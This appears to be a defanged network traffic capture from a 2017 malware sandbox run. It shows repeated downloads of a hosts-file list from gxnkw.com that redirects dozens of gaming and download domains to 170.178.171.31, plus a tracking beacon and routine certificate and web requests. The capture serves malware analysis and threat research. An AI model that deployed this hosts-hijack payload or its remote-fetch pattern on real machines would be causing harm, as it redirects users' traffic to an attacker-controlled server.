......Exif..II*.................Ducky.......F.....rhXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:1AB21EE2D186E011AF1EE9B4DAE6B957" xmpMM:DocumentID="xmp.did:8075A7ADFD1411E288C0AA50F7BC029F" xmpMM:InstanceID="xmp.iid:8075A7ACFD1411E288C0AA50F7BC029F" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f3ed0250-4dae-e34c-bf8c-3468d4276f83" stRef:documentID="xmp.did:1AB21EE2D186E011AF1EE9B4DAE6B957"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................................Z................................................................1aQ!A...............................?..Cj. @..... @..... 4...7...... .6.H.@....H. 7.)....V..H. .....U).).).)....R.B..@).)..P....E.AJ@)..P..JA.@).J@)....U[ ..S..<..?.....Jy..A..H.<.....@..).B.A......E).F..<.g..A...y..A..7..A..7...7.o .Eo ..o*7.o ...... ...s.*..*7.\... ....Ar..\....\....s.".. .A.....3.e../
<<< skipped >>>
GET /jc/tongji.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/plain
Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT
Accept-Ranges: bytes
ETag: "4c1ca75e9d9d01:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:41 GMT
HTTP/1.1 200 OK..Content-Length: 0..Content-Type: text/plain..Last-Modified: Mon, 17 Aug 2015 16:25:45 GMT..Accept-Ranges: bytes..ETag: "4c1ca75e9d9d01:22a0"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Thu, 19 Jan 2017 00:36:41 GMT......
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 5537
Content-Type: text/plain
Last-Modified: Thu, 05 Jan 2017 14:07:24 GMT
Accept-Ranges: bytes
ETag: "b05a1ba5d67d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:46 GMT
170.178.171.31 VVV.176cc.cc..170.178.171.31 VVV.52my.com..170.178.171.31 VVV.crsky.com..170.178.171.31 crsky.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 moyu.so..170.178.171.31 kkk.dstfkj.com.cn..170.178.171.31 dstfkj.com.cn..170.178.171.31 VVV.214my.com..170.178.171.31 VVV.h360k.com..170.178.171.31 h360k.com..170.178.171.31 rsivy.pw..170.178.171.31 214my.com..170.178.171.31 VVV.270my.com..170.178.171.31 360.chihuo0517.com..170.178.171.31 chihuo0517.com..170.178.171.31 270my.com..170.178.171.31 VVV.moyu.so..170.178.171.31 VVV.hwkam.com..170.178.171.31 178stu.com..170.178.171.31 VVV.178stu.com..170.178.171.31 hwkam.com..170.178.171.31 VVV.5917wan.com..170.178.171.31 VVV.delifs.com..170.178.171.31 delifs.com..170.178.171.31 VVV.11moyu.com..170.178.171.31 t2.web.tonnn.com..170.178.171.31 VVV.2828my.com..170.178.171.31 2828my.com..170.178.171.31 tonnn.com..170.178.171.31 VVV.11my.net..170.178.171.31 VVV.91my.com..170.178.171.31 91my.com..170.178.171.31 wg.91my.com..170.178.171.31 my.178stu.com..170.178.171.31 134my.com..170.178.171.31 VVV.134my.com..170.178.171.31 001my.com..170.178.171.31 VVV.910my.com..170.178.171.31 910my.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 VVV.6moyu.com..170.178.171.31 110moyu.com..170.178.171.31 VVV.110moyu.com..170.178.171.31 dl.pconline.com.cn..170.178.171.31 VVV.moyushou.com..170.178.171.31 pconline.com.cn..170.178.171.31 VVV.52z.com..170.178.171.31 wanba.baidu.com..170.178.171.31 VVV.99sfmy.com..170.178.171.31 VVV.myco
<<< skipped >>>
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 5537
Content-Type: text/plain
Last-Modified: Thu, 05 Jan 2017 14:07:24 GMT
Accept-Ranges: bytes
ETag: "b05a1ba5d67d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:58 GMT
170.178.171.31 VVV.176cc.cc..170.178.171.31 VVV.52my.com..170.178.171.31 VVV.crsky.com..170.178.171.31 crsky.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 moyu.so..170.178.171.31 kkk.dstfkj.com.cn..170.178.171.31 dstfkj.com.cn..170.178.171.31 VVV.214my.com..170.178.171.31 VVV.h360k.com..170.178.171.31 h360k.com..170.178.171.31 rsivy.pw..170.178.171.31 214my.com..170.178.171.31 VVV.270my.com..170.178.171.31 360.chihuo0517.com..170.178.171.31 chihuo0517.com..170.178.171.31 270my.com..170.178.171.31 VVV.moyu.so..170.178.171.31 VVV.hwkam.com..170.178.171.31 178stu.com..170.178.171.31 VVV.178stu.com..170.178.171.31 hwkam.com..170.178.171.31 VVV.5917wan.com..170.178.171.31 VVV.delifs.com..170.178.171.31 delifs.com..170.178.171.31 VVV.11moyu.com..170.178.171.31 t2.web.tonnn.com..170.178.171.31 VVV.2828my.com..170.178.171.31 2828my.com..170.178.171.31 tonnn.com..170.178.171.31 VVV.11my.net..170.178.171.31 VVV.91my.com..170.178.171.31 91my.com..170.178.171.31 wg.91my.com..170.178.171.31 my.178stu.com..170.178.171.31 134my.com..170.178.171.31 VVV.134my.com..170.178.171.31 001my.com..170.178.171.31 VVV.910my.com..170.178.171.31 910my.com..170.178.171.31 VVV.901my.com..170VVV.518ak.com..170.178.171.31 lpput.com..170.178.171.31 hjmyh.com..170.178.171.31 VVV.5555my.com..170.178.171.31 aaa.5555my.com..170.178.171.31 VVV.hjmyh.com..170.178.171.31 VVV.195my.com..170.178.171.31 195my.com..170.178.171.31 VVV.195sy.com..170.178.171.31 195sy.com..170.178.171.31 spxwj.com..170.178.171.31 817zs.cn..170.1
<<< skipped >>>
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 5537
Content-Type: text/plain
Last-Modified: Thu, 05 Jan 2017 14:07:24 GMT
Accept-Ranges: bytes
ETag: "b05a1ba5d67d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:36:58 GMT
170.178.171.31 VVV.176cc.cc..170.178.171.31 VVV.52my.com..170.178.171.31 VVV.crsky.com..170.178.171.31 crsky.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 moyu.so..170.178.171.31 kkk.dstfkj.com.cn..170.178.171.31 dstfkj.com.cn..170.178.171.31 VVV.214my.com..170.178.171.31 VVV.h360k.com..170.178.171.31 h360k.com..170.178.171.31 rsivy.pw..170.178.171.31 214my.com..170.178.171.31 VVV.270my.com..170.178.171.31 360.chihuo0517.com..170.178.171.31 chihuo0517.com..170.178.171.31 270my.com..170.178.171.31 VVV.moyu.so..170.178.171.31 VVV.hwkam.com..170.178.171.31 178stu.com..170.178.171.31 VVV.178stu.com..170.178.171.31 hwkam.com..170.178.171.31 VVV.5917wan.com..170.178.171.31 VVV.delifs.com..170.178.171.31 delifs.com..170.178.171.31 VVV.11moyu.com..170.178.171.31 t2.web.tonnn.com..170.178.171.31 VVV.2828my.com..170.178.171.31 2828my.com..170.178.171.31 tonnn.com..170.178.171.31 VVV.11my.net..170.178.171.31 VVV.91my.com..170.178.171.31 91my.com..170.178.171.31 wg.91my.com..170.178.171.31 my.178stu.com..170.178.171.31 134my.com..170.178.171.31 VVV.134my.com..170.178.171.31 001my.com..170.178.171.31 VVV.910my.com..170.178.171.31 910my.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 VVV.6moyu.com..170.178.171.31 110moyu.com..170.178.171.31 VVV.110moyu.com..170.178.171.31 dl.pconline.com.cn..170.178.171.31 VVV.moyushou.com..170.178.171.31 pconline.com.cn..170.178.171.31 VVV.52z.com..170.178.171.31 wanba.baidu.com..170.178.171.31 VVV.99sfmy.com..170.178.171.31 VVV.myco
<<< skipped >>>
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: VVV.117my.cc
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:39:59 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>............</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">..<STYLE type="text/css">.. BODY { font: 9pt/12pt .... }.. H1 { font: 12pt/15pt .... }.. H2 { font: 9pt/12pt .... }.. A:link { color: red }.. A:visited { color: maroon }..</STYLE>..</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>..<h1>............</h1>....................................................<hr>..<p>................</p>..<ul>..<li>........................................................</li>..<li>..................................................................................</li>..<li>....<a href="javascript:history.back(1)">....</a>....................</li>..</ul>..<h2>HTTP .... 404 - ..................<br>Internet ........ (IIS)</h2>..<hr>..<p>..............................</p>..<ul>..<li>.... <a href="hXXp://go.microsoft.com/fwlink/?linkid=8180">Microsoft ............</a>..........“HTTP”..“404”........</li>..<li>....“IIS ....”...... IIS ...... (inetmgr) ........................“........”..“............”..“..................”........</li>..</ul>..</TD><
<<< skipped >>>
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 5537
Content-Type: text/plain
Last-Modified: Thu, 05 Jan 2017 14:07:24 GMT
Accept-Ranges: bytes
ETag: "b05a1ba5d67d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:37:32 GMT
170.178.171.31 VVV.176cc.cc..170.178.171.31 VVV.52my.com..170.178.171.31 VVV.crsky.com..170.178.171.31 crsky.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 moyu.so..170.178.171.31 kkk.dstfkj.com.cn..170.178.171.31 dstfkj.com.cn..170.178.171.31 VVV.214my.com..170.178.171.31 VVV.h360k.com..170.178.171.31 h360k.com..170.178.171.31 rsivy.pw..170.178.171.31 214my.com..170.178.171.31 VVV.270my.com..170.178.171.31 360.chihuo0517.com..170.178.171.31 chihuo0517.com..170.178.171.31 270my.com..170.178.171.31 VVV.moyu.so..170.178.171.31 VVV.hwkam.com..170.178.171.31 178stu.com..170.178.171.31 VVV.178stu.com..170.178.171.31 hwkam.com..170.178.171.31 VVV.5917wan.com..170.178.171.31 VVV.delifs.com..170.178.171.31 delifs.com..170.178.171.31 VVV.11moyu.com..170.178.171.31 t2.web.tonnn.com..170.178.171.31 VVV.2828my.com..170.178.171.31 2828my.com..170.178.171.31 tonnn.com..170.178.171.31 VVV.11my.net..170.178.171.31 VVV.91my.com..170.178.171.31 91my.com..170.178.171.31 wg.91my.com..170.178.171.31 my.178stu.com..170.178.171.31 134my.com..170.178.171.31 VVV.134my.com..170.178.171.31 001my.com..170.178.171.31 VVV.910my.com..170.178.171.31 910my.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 VVV.6moyu.com..170.178.171.31 110moyu.com..170.178.171.31 VVV.110moyu.com..170.178.171.31 dl.pconline.com.cn..170.178.171.31 VVV.moyushou.com..170.178.171.31 pconline.com.cn..170.178.171.31 VVV.52z.com..170.178.171.31 wanba.baidu.com..170.178.171.31 VVV.99sfmy.com..170.178.171.31 VVV.myco
<<< skipped >>>
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 5537
Content-Type: text/plain
Last-Modified: Thu, 05 Jan 2017 14:07:24 GMT
Accept-Ranges: bytes
ETag: "b05a1ba5d67d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:37:33 GMT
170.178.171.31 VVV.176cc.cc..170.178.171.31 VVV.52my.com..170.178.171.31 VVV.crsky.com..170.178.171.31 crsky.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 moyu.so..170.178.171.31 kkk.dstfkj.com.cn..170.178.171.31 dstfkj.com.cn..170.178.171.31 VVV.214my.com..170.178.171.31 VVV.h360k.com..170.178.171.31 h360k.com..170.178.171.31 rsivy.pw..170.178.171.31 214my.com..170.178.171.31 VVV.270my.com..170.178.171.31 360.chihuo0517.com..170.178.171.31 chihuo0517.com..170.178.171.31 270my.com..170.178.171.31 VVV.moyu.so..170.178.171.31 VVV.hwkam.com..170.178.171.31 178stu.com..170.178.171.31 VVV.178stu.com..170.178.171.31 hwkam.com..170.178.171.31 VVV.5917wan.com..170.178.171.31 VVV.delifs.com..170.178.171.31 delifs.com..170.178.171.31 VVV.11moyu.com..170.178.171.31 t2.web.tonnn.com..170.178.171.31 VVV.2828my.com..170.178.171.31 2828my.com..170.178.171.31 tonnn.com..170.178.171.31 VVV.11my.net..170.178.171.31 VVV.91my.com..170.178.171.31 91my.com..170.178.171.31 wg.91my.com..170.178.171.31 my.178stu.com..170.178.171.31 134my.com..170.178.171.31 VVV.134my.com..170.178.171.31 001my.com..170.178.171.31 VVV.910my.com..170.178.171.31 910my.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 VVV.6moyu.com..170.178.171.31 110moyu.com..170.178.171.31 VVV.110moyu.com..170.178.171.31 dl.pconline.com.cn..170.178.171.31 VVV.moyushou.com..170.178.171.31 pconline.com.cn..170.178.171.31 VVV.52z.com..170.178.171.31 wanba.baidu.com..170.178.171.31 VVV.99sfmy.com..170.178.171.31 VVV.myco
<<< skipped >>>
GET /jc/hostjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.gxnkw.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 5537
Content-Type: text/plain
Last-Modified: Thu, 05 Jan 2017 14:07:24 GMT
Accept-Ranges: bytes
ETag: "b05a1ba5d67d21:22a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 19 Jan 2017 00:37:37 GMT
170.178.171.31 VVV.176cc.cc..170.178.171.31 VVV.52my.com..170.178.171.31 VVV.crsky.com..170.178.171.31 crsky.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 moyu.so..170.178.171.31 kkk.dstfkj.com.cn..170.178.171.31 dstfkj.com.cn..170.178.171.31 VVV.214my.com..170.178.171.31 VVV.h360k.com..170.178.171.31 h360k.com..170.178.171.31 rsivy.pw..170.178.171.31 214my.com..170.178.171.31 VVV.270my.com..170.178.171.31 360.chihuo0517.com..170.178.171.31 chihuo0517.com..170.178.171.31 270my.com..170.178.171.31 VVV.moyu.so..170.178.171.31 VVV.hwkam.com..170.178.171.31 178stu.com..170.178.171.31 VVV.178stu.com..170.178.171.31 hwkam.com..170.178.171.31 VVV.5917wan.com..170.178.171.31 VVV.delifs.com..170.178.171.31 delifs.com..170.178.171.31 VVV.11moyu.com..170.178.171.31 t2.web.tonnn.com..170.178.171.31 VVV.2828my.com..170.178.171.31 2828my.com..170.178.171.31 tonnn.com..170.178.171.31 VVV.11my.net..170.178.171.31 VVV.91my.com..170.178.171.31 91my.com..170.178.171.31 wg.91my.com..170.178.171.31 my.178stu.com..170.178.171.31 134my.com..170.178.171.31 VVV.134my.com..170.178.171.31 001my.com..170.178.171.31 VVV.910my.com..170.178.171.31 910my.com..170.178.171.31 VVV.901my.com..170.178.171.31 901my.com..170.178.171.31 VVV.6moyu.com..170.178.171.31 110moyu.com..170.178.171.31 VVV.110moyu.com..170.178.171.31 dl.pconline.com.cn..170.178.171.31 VVV.moyushou.com..170.178.171.31 pconline.com.cn..170.178.171.31 VVV.52z.com..170.178.171.31 wanba.baidu.com..170.178.171.31 VVV.99sfmy.com..170.178.171.31 VVV.myco
<<< skipped >>>
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDBisczuS0Hu180XFAA== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2017 00:40:23 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d2049b01a660478030f630d1690d5c2f91484786423; expires=Fri, 19-Jan-18 00:40:23 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Wed, 18 Jan 2017 21:33:38 GMT
Expires: Sun, 22 Jan 2017 21:33:38 GMT
ETag: "3b988710a19508382f2e4d9507fbb592efa91e39"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363c2d86d8405c-SOF
0..........0..... .....0......0...0.......M........u....%...G..20170118213338Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|....s;..{..E......20170118213338Z....20170122213338Z0...*.H.............JA....vU.........q.:Z.......Oj..6T..mZ3...k%..S7`\.. ..i(.|.[.}... }i.....N.......0D.*bO.UY..`...!0... .0y.s.........~.aR...3....0k?g..........C.....U...r..:C?.N'F~..l.....MW.Iw.?.?..k3.4.~V.... b=x/&.u.7.........a...8.....\5..>..q..1.....AtLO/..m....B.hI....K0..G0..C0.. .......q..}.dc.j..(0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-sa1<0:..U...3GlobalSign Organization Validation CA - SHA256 - G20...161124031843Z..170224031843Z0..1.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....2016112411281M0K..U...DGlobalSign Organization Validation CA - SHA256 - G2 - OCSP Responder0.."0...*.H.............0.........C..0j..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k.......D.........u..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V...l...P.6.V..G..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m..e;.....n.~..Wb.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a........0..0...U.......M........u....%...G0...U.#..0.....a....)S...};..@..|0... .....0......0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com/repository/0...U...........0...U.%..0... .......0...*.H..............H.....C.Ie....;.yN.'..../?.T..-T.a..4...n..OW/l....[|..-.i../.'..1."......3[...J.....\@.S.=-p..p......d...>~J.|E0y......!.;.c.,...||.V....K..L...dX...a....6'..U..G....A;..........4K...........k.B].s.3...
<<< skipped >>>
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDBisczuS0Hu180XFAA== HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 18 Jan 2017 21:33:38 GMT
If-None-Match: "3b988710a19508382f2e4d9507fbb592efa91e39"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 304 Not Modified
Date: Thu, 19 Jan 2017 00:40:27 GMT
Connection: keep-alive
Set-Cookie: __cfduid=dd9e2eab346214fdd619c23747ca55b821484786427; expires=Fri, 19-Jan-18 00:40:27 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Wed, 18 Jan 2017 21:33:38 GMT
Expires: Sun, 22 Jan 2017 21:33:38 GMT
ETag: "3b988710a19508382f2e4d9507fbb592efa91e39"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363c44618a405c-SOF
HTTP/1.1 304 Not Modified..Date: Thu, 19 Jan 2017 00:40:27 GMT..Connection: keep-alive..Set-Cookie: __cfduid=dd9e2eab346214fdd619c23747ca55b821484786427; expires=Fri, 19-Jan-18 00:40:27 GMT; path=/; domain=.globalsign.com; HttpOnly..Last-Modified: Wed, 18 Jan 2017 21:33:38 GMT..Expires: Sun, 22 Jan 2017 21:33:38 GMT..ETag: "3b988710a19508382f2e4d9507fbb592efa91e39"..Cache-Control: public, no-transform, must-revalidate..CF-Cache-Status: HIT..Server: cloudflare-nginx..CF-RAY: 32363c44618a405c-SOF......
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDGlwEnDh1Wq84Ev4Sw== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2017 00:40:40 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d995cc79ed802be9825730749a8dec62d1484786440; expires=Fri, 19-Jan-18 00:40:40 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Wed, 18 Jan 2017 23:26:57 GMT
Expires: Sun, 22 Jan 2017 23:26:57 GMT
ETag: "ce2c9bab38408c822469b28825da8da8a11ff254"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363c9250bb405c-SOF
0..........0..... .....0......0...0.......M........u....%...G..20170118232657Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|..ip.p..j..K.K....20170118232657Z....20170122232657Z0...*.H.............uO.5......./w;3.....3.J.n...E.....j.i..'...?.n>..J..l.sa......./....@.z..Qh.cc..l[...q.W ...g%.....o...f..."....9..;v_.n..m..!...f@.M...!.Yu.L3'C.6'......saI.G.d'B..b.u.H......_....m.f.Z.....g...DHY.z.O[.|U[o..#.O....0<....h....>...}..m..s....O..........8t...K0..G0..C0.. .......q..}.dc.j..(0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-sa1<0:..U...3GlobalSign Organization Validation CA - SHA256 - G20...161124031843Z..170224031843Z0..1.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....2016112411281M0K..U...DGlobalSign Organization Validation CA - SHA256 - G2 - OCSP Responder0.."0...*.H.............0.........C..0j..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k.......D.........u..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V...l...P.6.V..G..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m..e;.....n.~..Wb.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a........0..0...U.......M........u....%...G0...U.#..0.....a....)S...};..@..|0... .....0......0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com/repository/0...U...........0...U.%..0... .......0...*.H..............H.....C.Ie....;.yN.'..../?.T..-T.a..4...n..OW/l....[|..-.i../.'..1."......3[...J.....\@.S.=-p..p......d...>~J.|E0y......!.;.c.,...||.V....K..L...dX...a....6'..U..G....A;..........4K...........k.B].
<<< skipped >>>
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDEVLD4SzDqtMG/eBnw== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2017 00:40:51 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d56bb1059e2865a2d42351fb11199ebd51484786451; expires=Fri, 19-Jan-18 00:40:51 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Wed, 18 Jan 2017 23:28:53 GMT
Expires: Sun, 22 Jan 2017 23:28:53 GMT
ETag: "0db1f4e8f454c9f557e61810f001e1875842e319"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 32363cdcc475405c-SOF
0..........0..... .....0......0...0.......M........u....%...G..20170118232853Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|..EK.....L........20170118232853Z....20170122232853Z0...*.H...............g..N.MF......T..e.2..[1...=i.. .. 9O....v:{.$....1......g......K.F...!6.~....j#u....*P..U.....$.?. .b.w..m..E.k..X..o7...#.GC...l.;j%...K....v.=.3A...~1.j..f9s.9......b...1.x.x..3...N'......AQF...b.Z.P...v/.........[.'....3.[h~..l/5.X...3......9.....gX.....K0..G0..C0.. .......q..}.dc.j..(0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-sa1<0:..U...3GlobalSign Organization Validation CA - SHA256 - G20...161124031843Z..170224031843Z0..1.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....2016112411281M0K..U...DGlobalSign Organization Validation CA - SHA256 - G2 - OCSP Responder0.."0...*.H.............0.........C..0j..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k.......D.........u..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V...l...P.6.V..G..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m..e;.....n.~..Wb.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a........0..0...U.......M........u....%...G0...U.#..0.....a....)S...};..@..|0... .....0......0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com/repository/0...U...........0...U.%..0... .......0...*.H..............H.....C.Ie....;.yN.'..../?.T..-T.a..4...n..OW/l....[|..-.i../.'..1."......3[...J.....\@.S.=-p..p......d...>~J.|E0y......!.;.c.,...||.V....K..L...dX...a....6'..U..G....A;..........4K...........k.B].s.3...$..
<<< skipped >>>
GET / HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: VVV.taobao.com
HTTP/1.1 302 Found
Server: Tengine
Date: Thu, 19 Jan 2017 00:40:40 GMT
Content-Type: text/html
Content-Length: 258
Connection: keep-alive
Location: hXXps://VVV.taobao.com/
Set-Cookie: thw=ua; Path=/; Domain=.taobao.com; Expires=Fri, 19-Jan-18 00:40:40 GMT;
Strict-Transport-Security: max-age=31536000
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<h1>302 Found</h1>..<p>The requested resource resides temporarily under a different URI.</p>..<hr/>Powered by Tengine</body>..</html>..HTTP/1.1 302 Found..Server: Tengine..Date: Thu, 19 Jan 2017 00:40:40 GMT..Content-Type: text/html..Content-Length: 258..Connection: keep-alive..Location: hXXps://VVV.taobao.com/..Set-Cookie: thw=ua; Path=/; Domain=.taobao.com; Expires=Fri, 19-Jan-18 00:40:40 GMT;..Strict-Transport-Security: max-age=31536000..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<h1>302 Found</h1>..<p>The requested resource resides temporarily under a different URI.</p>..<hr/>Powered by Tengine</body>..</html>....
GET /rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH HTTP/1.1
Cache-Control: max-age = 10800
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 07:50:34 GMT
If-None-Match: "6b9ba9eca642c891cc02365fc6161341647bd9fc"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.globalsign.com
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2017 00:40:18 GMT
Content-Type: application/ocsp-response
Content-Length: 1518
Connection: keep-alive
Set-Cookie: __cfduid=dd5230a5dbbbba995e31d3feeb730dd801484786418; expires=Fri, 19-Jan-18 00:40:18 GMT; path=/; domain=.globalsign.com; HttpOnly
